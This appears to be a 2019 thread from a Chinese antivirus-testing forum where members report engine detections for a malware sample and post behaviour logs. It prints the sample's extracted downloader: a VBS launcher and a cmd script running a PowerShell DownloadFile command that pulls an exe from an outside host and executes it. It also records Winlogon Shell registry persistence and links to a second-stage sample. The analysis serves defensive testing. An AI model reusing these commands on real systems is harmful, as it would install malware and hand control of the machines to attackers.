搜索
查看: 809|回复: 11
收起左侧

[病毒样本] 1x

[复制链接]
llcy
发表于 2019-7-20 20:30:48 | 显示全部楼层
2019-07-20 121559.exe
威胁名称: SONAR.Heur.RGC!g403
jdsh
发表于 2019-7-20 20:37:43 | 显示全部楼层
本帖最后由 jdsh 于 2019-7-20 20:43 编辑

Emsisoft Anti-Malware


WD







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
发表于 2019-7-20 20:56:32 | 显示全部楼层
智量入库杀,火绒miss,有空双击。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
pal家族
发表于 2019-7-20 21:04:26 | 显示全部楼层
卡巴 暂时不报
温馨小屋
发表于 2019-7-20 21:05:29 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
Picca + 1 版区有你更精彩: )

查看全部评分

www-tekeze
发表于 2019-7-20 21:13:43 | 显示全部楼层
本帖最后由 www-tekeze 于 2019-7-20 21:18 编辑
www-tekeze 发表于 2019-7-20 20:56
智量入库杀,火绒miss,有空双击。。

双击,被智量主防连杀两次!退出智量双击,动作多得一批,但火绒始终不报毒。。   截图太累上个日志得了。


操作进程:C:\Windows\system32\taskeng.exe
命令行:taskeng.exe {FBED78C9-4212-4E1E-9A18-04E42F03AB50} S-1-5-21-1825905054-776965196-2370468693-1000:Wzz-PC\Wzz:Interactive:[1]
防护项目:[结束]疑似木马/病毒行为
操作目标:【执行】 C:\Users\Wzz\WinService.exe
操作结果:已允许

操作进程:C:\ProgramData\ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe
命令行:"C:/ProgramData/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe"
防护项目:[结束]疑似木马/病毒行为
操作目标:【执行】 C:\Users\Wzz\WinService.exe
操作结果:已允许

操作进程:C:\ProgramData\ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe
命令行:"C:/ProgramData/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe"
父进程:C:\Windows\SysWOW64\cmd.exe
防护项目:Winlogon Shell项
目标注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
操作类型:【写入】
数据内容:explorer.exe, C:\Users\Wzz\WinService.exe
操作结果:已允许

操作进程:C:\ProgramData\A4l8MoBWdgacafMjWLrm.cmd
命令行:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\A4l8MoBWdgacafMjWLrm.cmd" "
防护项目:[结束]疑似木马/病毒行为
操作目标:【执行】 C:\ProgramData\ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe
操作结果:已允许

操作进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
网络操作:外联
协议:TCP
远程地址:185.212.130.9:80
本地地址:192.168.1.16:49159
操作结果:已允许

操作进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
命令行:powershell  -Command "(New-Object Net.WebClient).DownloadFile('http://97762.prohoster.biz/7mks8x/rke0w9y5b0zva9iyx0hev/8335op993ag8vtat99cuerrmhwfpb8zthi86y0d7uunfgdk4y75jc5n16o2alv4l/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe', 'C:/ProgramData/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe')"
防护项目:[结束]PowerShell执行恶意脚本
操作目标:【读取】 C:\Users\Public\desktop.ini
操作结果:已允许

操作进程:C:\ProgramData\A4l8MoBWdgacafMjWLrm.cmd
命令行:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\A4l8MoBWdgacafMjWLrm.cmd" "
防护项目:[阻止]CMD启动可疑进程
操作目标:【执行】 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
操作结果:已允许

操作进程:C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs
命令行:"C:\Windows\System32\WScript.exe" "C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs"
防护项目:[阻止]wspt脚本解释器可疑操作
操作目标:【执行】 C:\Windows\SysWOW64\cmd.exe
操作结果:已允许

操作进程:C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs
命令行:"C:\Windows\System32\WScript.exe" "C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs"
防护项目:[阻止]wspt脚本解释器可疑操作
操作目标:【读取】 C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs
操作结果:已允许

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
swizzer
发表于 2019-7-20 21:55:59 | 显示全部楼层
下载器。。。
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData/A4l8MoBWdgacafMjWLrm.cmd", 0, false




powershell -Command "(New-Object Net.WebClient).DownloadFile('http://97762.prohoster.biz/7mks8x/rke0w9y5b0zva9iyx0hev/8335op993ag8vtat99cuerrmhwfpb8zthi86y0d7uunfgdk4y75jc5n16o2alv4l/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe', 'C:/ProgramData/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe')"
TIMEOUT /T 1 /NOBREAK>nul
"C:/ProgramData/ae8f0e6170cd6b45d0cc212ac0c66e0e8d722f2b.exe"
2019\7\20 星期六 21:50:45    创建新进程    允许
进程: c:\windows\explorer.exe
目标: f:\$1area\infected\2019-07-20 121559.exe
命令行: "F:\$1area\infected\2019-07-20 121559.exe"
规则: [应用程序]c:\windows\explorer.exe

2019\7\20 星期六 21:50:59    创建文件    允许
进程: f:\$1area\infected\2019-07-20 121559.exe
目标: C:\ProgramData\__tmp_rar_sfx_access_check_3453409
规则: [应用程序组]『询问』病毒测试 -> [文件组]秒杀写入

2019\7\20 星期六 21:51:01    删除文件    允许
进程: f:\$1area\infected\2019-07-20 121559.exe
目标: C:\ProgramData\__tmp_rar_sfx_access_check_3453409
规则: [应用程序组]『询问』病毒测试 -> [文件]*

2019\7\20 星期六 21:51:06    创建文件    允许
进程: f:\$1area\infected\2019-07-20 121559.exe
目标: C:\ProgramData\A4l8MoBWdgacafMjWLrm.cmd
规则: [应用程序组]『询问』病毒测试 -> [文件组]秒杀写入

2019\7\20 星期六 21:51:09    创建文件    允许
进程: f:\$1area\infected\2019-07-20 121559.exe
目标: C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs
规则: [应用程序组]『询问』病毒测试 -> [文件组]秒杀写入

2019\7\20 星期六 21:51:34    创建新进程    允许
进程: f:\$1area\infected\2019-07-20 121559.exe
目标: c:\windows\system32\wscript.exe
命令行: "C:\Windows\System32\WScript.exe" "C:\ProgramData\M4JyINviz9K43qfF3xPfYpmELDbWxr.vbs"
规则: [应用程序组]『询问』病毒测试





Jerry.Lin
发表于 2019-7-20 21:57:47 | 显示全部楼层
GD (BD ENGINE ONLY) SCAN MISS
swizzer
发表于 2019-7-20 22:20:58 | 显示全部楼层
下载下来的样本:https://c-t.work/s/aa142bf445dd4a
智量kill   Heur.ML.PE.B


您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-19 02:16 , Processed in 0.049071 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表